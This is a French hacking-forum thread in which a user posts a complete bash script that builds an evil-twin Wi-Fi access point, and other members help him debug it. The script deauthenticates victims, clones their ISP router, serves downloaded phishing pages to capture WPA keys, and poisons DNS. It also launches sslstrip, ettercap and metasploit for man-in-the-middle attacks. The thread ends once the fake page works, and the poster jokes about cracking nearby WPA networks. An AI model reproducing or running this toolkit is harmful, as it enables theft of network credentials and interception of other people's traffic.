Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-01-2011 22:20:33

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Probleme chargement fake page sur rogue non transparent

Bonsoir,
je ne peux pas être plus clair dans un titre.
J'ai récupéré un script, il doit être inspiré de GTWPA. Je m'en suis moi même inspiré, et je voulais remercier toute les personnes qui ont participé a ce projet.
Je viens au coeur du sujet big_smile
Alors, je vous fournis si besoin mon script, et mes fichiers dns.txt, httpd.conf et dhcpd.conf.
Je lance mon script, je mets le mode monitor sur ma carte, je sélectionne mon type de fake page, je lance airbase-ng, je lance les commande avec iptable et route add, ensuite je lance GADMIN-DHCPD (car je n'arrive pas à lancé le dhcp), je lance apache2.

lors des premiers test avec ce script, le reseau était créé, mais la victime n'arrivé pas a se connecter (pb de dhcp d'ou le choix de GADMIN-DHCPD)
maintenant il se connecte correctement et obtient une adresse ip du type 10.0.0.11 ou 12
je pense que c'est un problème de dns, mais je ne sais pas comment le résoudre. Je m'en remets à vous.

merci d'avance.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-01-2011 22:33:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Probleme chargement fake page sur rogue non transparent

Salut wink
Alors donne nous l'erreur dans la console quand tu lance dhcp(car tu dis ne pas pouvoir le lancer) et montre nous ton dns.txt et ton dhcp.conf, le problème viens du dhcp je pense smile

Hors Ligne

#3 21-01-2011 22:58:26

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Re : Probleme chargement fake page sur rogue non transparent

Comme promis, je vous transmets tout ce que j'ai.

en premier je vous transmet mon script

#!/bin/bash
intro="\n
-----------------------------------\n
~~~~~~~ \033[01;34mGTWPA - Unbutu9.10\033[0m ~~~~~~~\n
-----------------------------------\n"
ok="[\033[01;32mOK\033[0m]"

menu(){
clear
echo -e $intro
echo -e "\033[01;31m1ere étape (obligatoire):\033[0m"
echo ">> 1 Instalation de GTWPA"
echo ">> 2 Préparation de la Rogue AP"
echo ">> 3 Mode moniteur"
echo ">> 4 ciblage du réseau"
echo ">> 5 Lancer airbase-ng en open"
echo ">> 6 Lancer airbase-ng pour un mitm"
echo ">> 7 Déconnexion des victimes"
echo
echo -e "\033[01;31m2eme étape (obligatoire):\033[0m"
echo ">> 8 lancer un faux réseau avec internet"
echo ">> 9 lancer un faux réseau en local"
echo ">> 10 serveur web"
echo
echo -e "\033[01;31m3eme étape (facultative):\033[0m"
echo ">> 11 WKV et metasploit"
echo ">> 12 ettercap,sslstrip,drifnet" 
echo ">> 13 quitter" 
echo -n ">> Choix : " ; read choix

case $choix in

1)
clear
echo -e $intro
echo -e "\033[01;31m   --== Installation ==--\033[0m"
echo
echo -n "patientez..." ;
rm -f -r /root/GTWPA
mkdir /root/GTWPA
mkdir /root/GTWPA/server
mkdir /root/GTWPA/server/backup
mkdir /root/GTWPA/server/rogue
mkdir /root/GTWPA/stats
mkdir /root/GTWPA/conf
mkdir /root/GTWPA/logs
echo -e $ok
cd /root/GTWPA/server/backup
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 0%[>               ]"
echo -e
wget http://www.crack-wpa.fr/tl/Numericable.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 20%[===>            ]"
echo -e
wget http://www.crack-wpa.fr/tl/Freebox.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 40%[======>         ]"
echo -e
wget http://www.crack-wpa.fr/webcapitain/rogue_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 60%[=========>      ]"
echo -e
wget http://www.crack-wpa.fr/webcapitain/neuf_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 80%[============>   ]"
echo -e
wget http://www.crack-wpa.fr/tl/Speedtouch.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 90%[=============>  ]"
echo -e
wget http://www.crack-wpa.fr/tl/Neufbox.tar.gz
cd /root/GTWPA/stats
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wpa.fr/tl/conf/stats.txt
mv stats.txt stats.php
cd /root/GTWPA/conf
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wpa.fr/tl/conf/httpd.conf
cd /root/GTWPA/logs
> log.txt
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 100%[===============>]"
echo -e
sleep 3
clear
echo -e $intro
echo -e "--> Installation terminée"
echo -e $ok
sleep 2
;;

2)
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo "Veuillez selectionner le type de Panel par rapport à la box de votre victime:"
echo
echo "1: Numericable"
echo "2: Freebox"
echo "3: Livebox"
echo "4: SFR-Neufbox"
echo "5: Tele2box Speedtouch"
echo "6: Neufbox originale"
echo
echo -n "Type: ";read type
if [ "$type" -eq "1" ] ; then
echo -e $intro
echo "--> Type: Numericable"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Numericable.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Numericable.tar.gz
chmod -R 777 /root/GTWPA/server/rogue
cd /root/GTWPA/server
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3

elif [ "$type" -eq "2" ] ; then
echo -e $intro
echo "--> Type: Freebox"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Freebox.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Freebox.tar.gz
chmod -R 777 /root/GTWPA/server/rogue
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3 

elif [ "$type" -eq "3" ] ; then
echo -e $intro
echo "--> Type: Livebox"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/rogue_php.zip /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
unzip rogue_php.zip
chmod -R 777 /root/GTWPA/server/rogue
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3

elif [ "$type" -eq "4" ] ; then
echo -e $intro
echo "--> Type: SFR-Neufbox"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/neuf_php.zip /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
unzip neuf_php.zip
chmod -R 777 /root/GTWPA/server/rogue
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3

elif [ "$type" -eq "5" ] ; then
echo -e $intro
echo "--> Type: Tele2Box Speedtouch"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Speedtouch.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Speedtouch.tar.gz
chmod -R 777 /root/GTWPA/server/rogue
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3

elif [ "$type" -eq "6" ] ; then
echo -e $intro
echo "--> Type: NeufBox Originale"
echo
echo -e "Rogue AP en configuration..."
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Neufbox.tar.gz /root/GTWPA/server/rogue
cd /root/GTWPA/server/rogue
tar -xf Neufbox.tar.gz
chmod -R 777 /root/GTWPA/server/rogue
rm -f -r /var/www/*
cp -r /root/GTWPA/server/rogue/* /var/www
chmod -R 777 /var/www
cd /root
clear
echo -e $intro
echo -e "\033[01;31m   --== Préparation de la Rogue AP ==--\033[0m"
echo
echo -n "Rogue AP configurée...";
echo -e $ok
sleep 3
fi
;;

3)
clear
echo -e $intro
echo -e "\033[01;31m   --== Airmon-ng ==--\033[0m"
echo
echo -n "Inteface? " ; read interface
xterm -e airmon-ng stop $interface
xterm -e airmon-ng stop mon0
xterm -e airmon-ng start $interface
echo
echo -n "passage en mode moniteur...";
echo -e $ok
sleep 2
;;

4)
clear
echo -e $intro
echo -e "\033[01;31m   --== Ciblage du réseau ==--\033[0m"
echo
echo "Airodump-ng"

echo -n "Bssid (Adresse mac du point d'acces de la victime)? ";read bssid
echo -n "Essid (Nom du point d'acces de la victime)? ";read essid
echo 
clear
echo -e $intro
echo -e "\033[01;31m   --== Ciblage du réseau ==--\033[0m"
echo
#echo "Airodump-ng"
echo
echo -n "Bssid: ";echo -e $bssid
echo $bssid>/root/GTWPA/server/rogue/macap.txt
echo -n "Essid: ";echo -e $essid
echo $essid>/root/GTWPA/server/rogue/essid.txt
echo
echo -n "Selection du réseau";
echo -e $ok
sleep 4
;;

5)
clear
echo -e $intro
echo -e "\033[01;31m   --== airbase-ng en open ==--\033[0m"
echo 
echo -n "Canal? ";read canal
essidtemp=$(cat /root/GTWPA/server/rogue/essid.txt)
echo -e $canal
echo -n "Lancement de airbase...";

xterm -hold -e airbase-ng -c $canal -e $essidtemp mon0 &> /dev/null &
echo -e $ok
sleep 3
;;

6)
clear
echo -e $intro
echo -e "\033[01;31m   --== airbase-ng pour un mitm ==--\033[0m"
echo
essidtemp=$(cat /root/GTWPA/server/rogue/essid.txt)
bssidtemp=$(cat /root/GTWPA/server/rogue/macap.txt)
echo -n "Canal? ";read canal
echo
echo -n "Lancement de airbase...";
xterm -hold -e airbase-ng -c $canal -e $essid -a $bssid mon0 &> /dev/null &
echo -e $ok
sleep 3
;;

7)
clear
echo -e $intro
echo -e "\033[01;31m   --== Deconnexion ==--\033[0m"
echo
bssid=$(cat /root/GTWPA/server/rogue/macap.txt)
echo -n "Adresse mac de la station à deconnectée? ";read station
clear
echo -e $intro
echo -e "\033[01;31m   --== Deconnexion ==--\033[0m"
echo
echo -n "Aireplay-ng avec station...";
xterm -e aireplay-ng -0 30 -a $bssid -c $station mon0 &> /dev/null &
echo -e $ok
echo -n "Aireplay-ng sans station...";
xterm -e aireplay-ng -0 60 -a $bssid mon0 &> /dev/null &
echo -e $ok
sleep 5
;;

8)
clear
echo -e $intro
echo -e "\033[01;31m   --== réseau avec internet ==--\033[0m"
echo
echo -n "montage de at0..." ;
ifconfig at0 up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
echo -e $ok
echo -n "Démarrage du serveur" ;
cd / ;
cd etc ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
echo > dhcpd.leases ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null ;
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $routeur ;
iptables --table nat --append POSTROUTING --out-interface $inet -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
echo -e $ok
#xterm -hold -e /etc/init.d/dhcp3-server restart &> /dev/null &
echo -e $ok
sleep 5
;;

9)
clear
echo -e $intro
echo -e "\033[01;31m   --== réseau sans internet ==--\033[0m"
echo
echo -n "Montage de at0..." ;
ifconfig at0 up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
echo -e $ok
echo -n "Démarrage du serveur..." ;
cd / ;
cd etc ;
echo > dhcpd.leases ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null ;
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1 ;
iptables -P FORWARD ACCEPT ;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80 ;
#xterm -hold -e /etc/init.d/dhcp3-server restart &> /dev/null &
echo -e $ok
sleep 5
;;

10)
clear
echo -e $intro
echo -e "\033[01;31m   --== serveur httpd ==--\033[0m"
echo
echo -n "Démarrage de HTTPD...";
httpd -f /root/GTWPA/conf/httpd.conf &> /dev/null ;
echo -e $ok
sleep 1
echo
echo -n "Démarrage de Apache...";
xterm -e a2enmod rewrite 
xterm -e service apache2 stop
sleep 1
xterm -e /etc/init.d/apache2 reload
xterm -hold -e service apache2 restart &
echo -e $ok
sleep 1
echo
echo -n "Montage de dnspoison..." ;
xterm -hold -e dnsspoof -i at0 -f /root/GTWPA/conf/dns.txt &
echo -e $ok
sleep 1
echo -n "Visualisation de la page de notre victime...";
firefox 127.0.0.1
echo -e $ok
sleep 4
;;

11)
clear
echo -e $intro
echo -e "\033[01;31m   --== envoi de WKV ==--\033[0m"
cp -f /wkv.exe /tmp/wkv.exe
echo -n "Lancement de metasploit..." ;
cd /opt/metasploit3/msf3 ;
xterm -hold -T "Meterpreter" -e msfconsole &> /dev/null &
echo -e $ok
sleep 11
;;

12)
echo -e $intro
echo -n "Démarrage ettercap" ;
xterm -hold -e ettercap -T -q -p -i at0 // // &> /dev/null & ettpid=$!
echo -e $ok
echo -n "Démarrage sslstrip" ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
xterm -hold -e sslstrip -a -k -f &> /dev/null & sslpid=$
echo -e $ok
echo -n "Démarrage driftnet" ;
xterm -hold -e driftnet -v -i at0 &> /dev/null & driftpid=$
echo -e $ok
sleep 12
;;

13)
echo -e $intro
echo -n "Merci d'avoir essayé ce tool:)"
echo
clear
exit
;;

esac
}
while true;do menu
done
exit

en second je vous transmet mon dhcpd.conf

ddns-update-style none;
interface="at0";
default-lease-time 3600;
max-lease-time 86400;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    range 10.0.0.20 10.0.0.30;
}

en troisième mon dns.txt

10.0.0.10 *.fr
10.0.0.10 *.com

et voici l'erreur lorsque je lance la commande "/etc/init.d/dhcp3-server restart"

dhcpd self-test failed. Please fix the config file.
The error was:
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
/root/GTWPA/conf/dhcpd.conf line 2: expecting a parameter or declaration
ddns-update-style none;
                       ^
Configuration file errors encountered -- exiting

Faites moi signe si vous avez besoin d'autres choses.

Hors Ligne

#4 21-01-2011 23:05:36

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Probleme chargement fake page sur rogue non transparent

Salut benjamin1205, bienvenue sur le forum smile

Il y a une façon simple de vérifier si c'est "juste" un problème de DNS : tu dois déjà pouvoir surfer en utilisant les IP plutôt que les noms de domaine. Essaie de ping'er une adresse internet (genre ping 8.8.8.8) depuis le client, ou de surfer en tapant 74.125.79.99 dans son navigateur.
Si ça marche, c'est effectivement un problème de DNS, au moins on saura où chercher wink

Hors Ligne

#5 22-01-2011 00:16:11

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Probleme chargement fake page sur rogue non transparent

lol  Ce script c'est moi qui l'avais envoyer il y a un petit moment, prends le dernier que j'ai fais dans le topic technique de récupération de clé wpa par rogue et php, il et plus ciblé "wpa" et moins outils mutltifonction (n'est-ce pas squaks? big_smile ) sinon tu as GTWPA aussi wink

Pour ce message:

Configuration file errors encountered -- exiting

C'est clair que c'est le dhcp qui merde, voila le mien:

option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;


subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;

}

et lance dhcp pour tester avec

/etc/init.d/dhcp3-server restart

Bien sur il faut que tu est déja lancer airbase avant pour que sa marche avec l'interface at0.

Il marche impec chez moi smile

Dernière modification par koala (22-01-2011 00:21:06)

Hors Ligne

#6 22-01-2011 11:20:30

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Re : Probleme chargement fake page sur rogue non transparent

Merci a Antares145 et à toi Koala.
Alors, j'ai modifié mon fichier dhcpd.conf avec ta config koala, et le serveur se lance nikel, je n'ai plus de message d'erreur. Quant au lancement de la page sur le pc victime, lorsque je veux atteindre une page (classique??) du style "www.google.fr" sa ne marche pas. Mais j'ai essayé de faire 8.8.8.8 et la sa l'a atteint directement. Pourquoi?
Je tiens a préciser que sur la fenètre du dnsspoof, on peut y voir plein de requète de l'adresse ip victime vers mon adresse ip en ayant differente adresse.

Dans l'attente que vous m'eclairiez ma lanterne.

Je sens que je suis tout prés du but.



PS: savez vous si on peut mettre un temps de vie sur une fenetre xterm?

Hors Ligne

#7 22-01-2011 15:25:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Probleme chargement fake page sur rogue non transparent

Alors si c'est pas déga fait:

apt-get install dsniff

Ensuite tu places ton fichier dns dans avec ton script (vérifie bien que le chemin du fichier soit bon dans le script)

Donne des droits a tes pages dans apache sinon sur ton pc cible t'auras un peut etre droit a un "permission denied"

sudo chown -R root:www-data /var/www/*
find /var/www -type d -exec sudo chmod 750 {} \;
find /var/www -type f -exec sudo chmod 640 {} \;

Vérifie que le port 80 sois libre

netstat -ntlp | grep 80

Lance ta rogue, connecte toi démarre apache

service apache2 stop
service apache 2 restart

ensuite lance dnsspoof par exemple pour moi c'est

dnsspoof -i at0 -f /root/dns.txt

Et indique nous ce que tu obtiens quand tu tape l'adresse ip de ton pc attaquant sur ton pc cible,tu devrais arriver sur la fake page wink si t'as une erreur montre la nous.

Dernière modification par koala (22-01-2011 15:30:24)

Hors Ligne

#8 27-01-2011 13:26:32

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Re : Probleme chargement fake page sur rogue non transparent

Désolé pour tout ce temps écoulé, j'étais chez ma copine fraichement installé, donc pas d'internet, mais plein de reseau en WPA big_smile
Enfin bref, reprenons la ou nous en étions,

lors de l'installation de dsniff, il me dit que la version actuellement installé est deja la plus récente,

au niveau des autorisations, j'ai su résoudre ce soucis tout seul car je l'ai deja eu (hi hi), donc pas de soucis lors de l'ouverture des pages.

Je pense pouvoir dire que le port 80 est libre car la commande " netstat -ntlp | grep 80 ", ne me retourne rien.

Et lorsque je tape l'adresse du pc attaquant dans le navigateur de la victime (soit 10.0.0.1), j'arrive bien sur ma fake page. mais lorsque je tape l'adresse basique "google.fr" sa charge longtps pour me dire que le delai est dépassé.

Voilà, j'espère que cela vous éclair plus que moi, je continu mais recherche, et si par miracle je trouve quelque chose je vous tiens au courant.

Merci pour tous encore.

Hors Ligne

#9 27-01-2011 13:40:30

benjamin1205
Nouveau membre
Inscription : 23-04-2010
Messages : 9

Re : Probleme chargement fake page sur rogue non transparent

Bonjour, je m'appelle BOULET et je demande des conseils.

Non pour finir ma plaisanterie, je pense avoir trouvé mon problème.

voici mon fichier dns.txt

10.0.0.10 *.fr
10.0.0.10 *.com

donc quand je l'ai vu je me suis dis qu'il y avais un problème, je l'ai modifié par

10.0.0.1 *.fr
10.0.0.1 *.com

et la, le premier test marche, donc je continus mes test et le développement et je post une version qui marche.

Bonne journée a tous.

Je vous remercie encore une fois pour le gros coup de main que vous m'avez donné.

Hors Ligne

#10 27-01-2011 13:50:51

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Probleme chargement fake page sur rogue non transparent

T'inquietes on fait tous l'erreur lol

10.0.0.1 *.*

Va voir la
mon script

et la
GTWPA script

Pour avoir quelque chose de bien smile

Dernière modification par koala (27-01-2011 13:55:40)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2100 28-11-2016 19:42:10 par koala
35 1713 23-11-2016 16:31:33 par roofnat
16 1031 17-11-2016 12:22:00 par disquette
Problème reaver par Antho3674
4 295 15-11-2016 22:05:12 par kcdtv
10 414 11-11-2016 22:11:03 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]